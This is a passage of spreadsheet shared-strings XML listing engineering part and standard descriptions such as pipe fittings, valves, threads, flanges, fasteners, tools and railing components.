  <si>
    <t>Surface roughness-indications</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Surface roughness values</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Specification of welded joints</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Symbol designations for welding seams</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>symbol designation for inclined welding joints</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instruction for specification of welding quality</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instruction for edge preparation of welding grooves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>symbolic representation of instruments in pipe plants</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>symbols and abbreviations ,summary</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>G-pipe parallel threads,nominal dimensions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Trapez threads</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instructions for tightening and dismounting nuts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tolerances for linear and angular dimensions without individual tolerance indications</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MBD(SI) unit system</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SI units, conversion factors</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dimensions for flats,squares and hexagons,suitable spanners</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WG TOLERANCE DIN 11</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WG TOLERANCE BS 84 TABLES 4 AND 5</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THREAD TOLERANCES WFG (MEDIUM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WFG TOLERANCE(SPECIAL)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOLERANCE OF SPANNER JAWS(INCH BASE)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Housing dimensions for sealing rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONVERSION TABLES FEET&amp;INCHES TO MILLIMETERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Comparison of nominal sizes for DIP and  HEB profiles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Securing of studs (in fitting end)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITWORTH THREAD NOMINAL DIMENSIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITWORTH FINE THREAD NOMINAL DIMENSIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ISO-metric coarse threads,tolerances,class 6 g</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bending radii for pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ISA TOLERANCES AND OLD B&amp;W TOLERANCES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Basic symbols for pipe plants</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Packing material, jacketed</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Jacketed packings, rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Annular groove in shaft for retaining rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Annular groove in borings for retaining rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Multicore Cable,Data</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cable ties,stainless steel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Block Clamps,light duty</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Block Clamps,heavy duty</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Blind river,steel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon head screws,elektroplated</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon socket set screw with cone point</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Glued sealing rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RHS steel pipes rectangular</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RHS steel pipes,square</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>penn locking nuts complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>pipe bends,90 deg</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>pipe bends,a deg</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>caps,with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>caps</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bosses for termometer and test cocks for exhaust pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sockets</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>plug screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon head plug screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>plug screws,Blanking Ends</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>plug screws.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometers,liquid,straight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometers,liquid,angle 90°</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometers(Gas expansion),dial type,straight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometers(Bimetallic),dial type,straight</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Resistance thermometer,pt 100</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Temperature transmitter,4-20mA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Resistance thermometer,NiCr-Ni</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bandsteel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Band steel,stainless</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Round steel bars,stainless</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Square steel bars,stainless</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Flat steel bars and edge plates</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Floor plates</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Steel plates for oxy-acetylene cutting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Steel plates </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Steel plates,hot galvanized</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>I-profiles type HEB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>I-profiles type IPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>U-profiles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hot rolled angle profiles,unequal flanges</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hot rolled I-profiles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RHS steel pipes, stainless</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RHS steel pipes rectangular,stainless</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stainless wire mesh</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tee handles square drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ratchet handles ,reversible</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Extension bars</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bit,hexagon socket screws,square drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Socket spanners,hexagon drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Socket spanners,square drive,double hex.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Universal joints,square drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Key,hexagon socket screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting eye bolts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screws for shackles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shackles,forged-bent with screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pliers for retaining rings for shaft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pliers for retaining rings for borings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engineers spanners,single head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Engineers spanners,double head,open end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slugging spanners,open end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slugging spanners,ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ring spanners,single end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Box for key set,hexagon socket screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon socket screws key,little key set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon socket screws key,big key set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Key diagram for hexagon key set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Boxes for tool set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Platform Stiffeners</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring pins</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Butterfly valves,without flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball valves,with flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straight cocks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Three-way cocks with handle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Globe valves,bronze</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Throttle valves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Butterfly valves,flange type housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Angle globe valves,bronze</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Angle globe valves,cast iron</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Globe valves,cast iron</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Equal leg angle profiles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>I-profiles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Steel pipes,with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reducers,concentric</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tees,with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tees,thin and thick walled</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends,αdeg.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends,αdeg.,with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends,90 deg./180 deg.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends,90 deg./180 deg.,with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends,90 deg.,short</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends,90 deg.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Deep dished heads</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends,short,αdeg</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Weld-on flanges,with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Welding neck flanges,with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylindrical dowels with tolerance</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tapered dowels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylindrical dowels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cylindrical dowels with head and threaded hole</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tapered dowel with threaded tap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Union nuts with SRG for pipe connections</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Equal elbow couplings,complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adjustable straight male stud couplings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straight male stud couplings,complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adjustable elbow couplings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Male stud L-couplings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Male stud Tee couplings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Unions for stud connections for steel pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bosses for copper pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adjustable Tee couplings,complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adjustable L-couplings,complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reducing stand pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe collar nipple</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nozzles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Copper packing rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Packings for oval flanges</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Packing for oval flages</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Description of packing material</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Securing washer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends 90°,male and female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends 90°,female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe elbows 90°,male and female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe elbows 90°,female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reducing sockets</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reducing nipples</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Unions with taper seat,female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Unions with taper seat,male and female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Beaded plugs</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe fittings,long screws,complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pull rod pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grease cups</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plate thicknesses suitable for oxy-acetylene cutting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Round,square and flat steel bars together with edge-rolled plates</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Glue </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adhesive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometers complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometer inserts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thermometer housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stem tubes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon socket vent screw</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Studs with WG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon-headed screws with WG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Set screws with SRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Set screws with WG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slotted screw with arched countersunk head iso-metric thread</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oval slotted countersunk head screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Slotted countersunk (flat) head wood screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Round-headed screws with Whitworth thread</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Grub screw with slot and WG thread</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon set screws with dog point</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Washers for impact handwheel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Taper washers for U-girders</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Taper washers for I-profiles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Taper washers for I-girders</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon fit bolts,special</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eye bolts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Eye nuts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nuts with WG for Penn locking assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nuts with Penn locking rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Handwheels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Impact handwheels</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Handles for welding-on</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screw-on handles</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ladder steps</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gusset plate for ladder</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Vertical steel ladders</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pull rods,complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pull rod ends</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scraping ring complete and housing dimensions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Railing support with foot</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rail holders with stud</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rail holders,complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Angle foot for stanchions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Base for stanchions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Primer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Railing-arrangement</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stanchion with base,complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Railing support at railing end</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Railing support at railing ends</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plugs for railing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Top plate for stanchions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stanchion stud</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Round bars railing assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Scraping rings,dimensions</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>spring locks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>saddle washers</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>tapered pins</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>hexagon socket head cap screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>hexagon socket low head cap screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>slotted headless screws</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>self-locking nuts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straight valves</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Angle valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straightway valves, female/female, with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straightway valves, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straightway valves, male and male</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valves, needel</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valves, needle with test flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Non-return valves, male</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Butterfly valves, flange type housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Butterfly valves, wafer type</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball valves, without handle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straight coplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Equal elbow couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Equal Tee couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straight bulkhead couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Welding couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straight male stud couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straight male stud couplings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Elbow bulkhead couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Elbow bulkhead couplings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adjustable elbow couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adjustable Tee couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Adjustable L-couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reducing connections, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Welding nipples with O-ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Equal cross couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Banjo couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Straight female couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reducing adaptors, male/female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Couplings for manometer, male/female</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Throttlefree banjo couplings, complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cutting rings, with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Reinforcing rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tees</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Round and edged cap nuts</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Outer flanges</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Connecting inner flanges</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Weld-on flanges, with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Welding neck flanges, with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Angle adaptors</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Packing material, plates</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Packing-Silicone paste sealing material</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Precision steel pipes, with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Steel pipes, with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MK-pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pipe bends 90 deg., with certificate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Securing pin w.spring lock</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTED BOLT, SOCKET HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR KIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE PROFILE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Base plate for HCU - machining</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Base plate for HCU - welding</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TDC INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOMMY BAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
